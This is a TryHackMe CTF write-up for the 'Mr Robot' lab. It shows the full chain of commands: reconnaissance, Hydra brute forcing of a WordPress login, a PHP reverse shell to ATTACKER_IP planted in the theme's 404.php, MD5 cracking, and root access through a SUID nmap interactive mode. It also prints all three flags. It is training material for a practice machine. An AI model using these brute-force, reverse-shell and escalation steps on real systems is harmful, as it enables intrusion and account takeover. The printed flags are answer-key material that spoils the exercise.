← back to writeups
platform TryHackMe
difficulty Medium

---

OVERVIEW

--------

Mr Robot is a Medium-rated Linux CTF themed around the TV show. Three keys are hidden

across the machine. The path involves web enumeration, WordPress credential bruteforcing,

a PHP reverse shell via the Theme Editor, MD5 hash cracking to pivot to a second user,

and privilege escalation via a SUID nmap binary running in interactive mode.

Target IP: 10.129.145.62

---

SUMMARY

-------

Step 1 — Recon: Nmap + Gobuster

Step 2 — robots.txt: Key 1 + custom wordlist discovered

Step 3 — Enum: WordPress confirmed, wp-login.php found

Step 4 — Bruteforce: Hydra username enum → elliot | Hydra password brute → ER28-0652

Step 5 — Foothold: PHP reverse shell via WP Theme Editor (Twenty Fifteen → 404.php)

Step 6 — Pivot: password.raw-md5 cracked → su robot → Key 2

Step 7 — PrivEsc: SUID nmap --interactive → !sh → root → Key 3

---

FLAGS

-----

Key 1: 073403c8a58a1f80d943455fb30724b9 (robots.txt → /key-1-of-3.txt)

Key 2: 822c73956184f694993bede3eb39f959 (/home/robot/key-2-of-3.txt)

Key 3: 04787ddef27c3dee1ee161b21670b4e4 (/root/key-3-of-3.txt)

---

RECON

-----

Phase 1 — fast scan of all ports:

nmap -p- -T4 --min-rate 1000 --open --max-retries 2 10.129.145.62

Open ports: 22 (SSH), 80 (HTTP), 443 (HTTPS)

Phase 2 — deep scan on open ports:

nmap -sC -sV -p 22,80,443 10.129.145.62

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2p1 Ubuntu

80/tcp open http Apache httpd

443/tcp open ssl/http Apache httpd

SSL cert: commonName=www.example.com (expired)

Directory brute force:

gobuster dir -u http://10.129.145.62 -w /usr/share/wordlists/dirb/common.txt -x php,txt

Notable results:

/wp-login.php (Status: 200) — WordPress login page

/wp-admin (Status: 301) — WordPress admin panel

/robots.txt (Status: 200)

/license (Status: 200)

/readme (Status: 200)

/phpmyadmin (Status: 403)

---

KEY 1 — robots.txt

-------------------

curl http://10.129.145.62/robots.txt

User-agent: *

fsocity.dic

key-1-of-3.txt

curl http://10.129.145.62/key-1-of-3.txt

073403c8a58a1f80d943455fb30724b9

Download the custom wordlist:

wget http://10.129.145.62/fsocity.dic

Remove duplicates (858,160 → 11,451 lines):

sort -u fsocity.dic > fsocity_clean.dic

wc -l fsocity.dic fsocity_clean.dic

858160 fsocity.dic

11451 fsocity_clean.dic

---

WORDPRESS CREDENTIAL BRUTEFORCE

--------------------------------

WordPress reveals different error messages for invalid usernames vs wrong passwords,

making username enumeration possible.

Step 1 — enumerate valid usernames:

hydra -L fsocity_clean.dic -p test 10.129.145.62 http-post-form \

"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username" -t 30

[80][http-post-form] host: 10.129.145.62 login: elliot password: test

Valid username: elliot

Step 2 — bruteforce password for elliot:

hydra -l elliot -P fsocity_clean.dic 10.129.145.62 http-post-form \

"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username" -t 30

[80][http-post-form] host: 10.129.145.62 login: elliot password: ER28-0652

Credentials: elliot / ER28-0652

---

FOOTHOLD — PHP Reverse Shell via Theme Editor

---------------------------------------------

Login at http://10.129.145.62/wp-login.php with elliot:ER28-0652

Navigate to: Appearance → Editor → 404.php (Twenty Fifteen theme, active)

Replace the entire file content with:

& /dev/tcp/ATTACKER_IP/4444 0>&1'"); ?>

Click Update File.

Start listener on attack machine:

nc -nlvp 4444

Trigger the shell by visiting:

http://10.129.145.62/wp-content/themes/twentyfifteen/404.php

Shell received:

connect to [192.168.133.223] from (UNKNOWN) [10.129.145.62] 40242

bash: no job control in this shell

/wordpress/htdocs/wp-content/themes/twentyfifteen$

Upgrade to interactive TTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'

---

KEY 2 — Hash Crack + User Pivot

---------------------------------

Find key locations:

find / -name "key-2-of-3.txt" 2>/dev/null

/home/robot/key-2-of-3.txt

List /home/robot/:

ls -la /home/robot/

-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt

-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5

Read the hash (world-readable):

cat /home/robot/password.raw-md5

robot:c3fcd3d76192e4007dfb496cca67e13b

Crack at crackstation.net:

c3fcd3d76192e4007dfb496cca67e13b → md5 → abcdefghijklmnopqrstuvwxyz

Switch to robot user:

su robot

Password: abcdefghijklmnopqrstuvwxyz

cat /home/robot/key-2-of-3.txt

822c73956184f694993bede3eb39f959

---

PRIVILEGE ESCALATION — SUID nmap Interactive Mode

--------------------------------------------------

Find SUID binaries:

find / -perm -u=s -type f 2>/dev/null

Notable: /usr/local/bin/nmap

nmap version 3.81 supports --interactive mode which allows shell command execution.

Because nmap has the SUID bit set (runs as root), any shell spawned inherits root.

nmap --interactive

Starting nmap V. 3.81

nmap> !sh

# cat /root/key-3-of-3.txt

04787ddef27c3dee1ee161b21670b4e4

Root shell obtained.

---

ATTACK CHAIN

------------

robots.txt → Key 1 + fsocity.dic wordlist

→ Hydra username enum → elliot

→ Hydra password brute → ER28-0652

→ WP Theme Editor → 404.php PHP reverse shell

→ www-data shell

→ /home/robot/password.raw-md5 → MD5 cracked → abcdefghijklmnopqrstuvwxyz

→ su robot → Key 2

→ SUID nmap --interactive → !sh → root → Key 3

---

KEY TAKEAWAYS

-------------

  • Always check robots.txt — it can reveal hidden files and custom wordlists.
  • WordPress error messages differ for invalid username vs wrong password — exploitable for enumeration.
  • Deduplicate wordlists before bruteforcing: 858k → 11k lines saved significant time.
  • World-readable hash files are a quick win — always check home directories for readable files.
  • find / -perm -u=s -type f 2>/dev/null is the standard first step for Linux PrivEsc.
  • Old nmap versions (< 5.x) with SUID set allow root shell via --interactive mode and !sh.
  • The fsocity.dic wordlist from robots.txt was the key to both username and password brute force.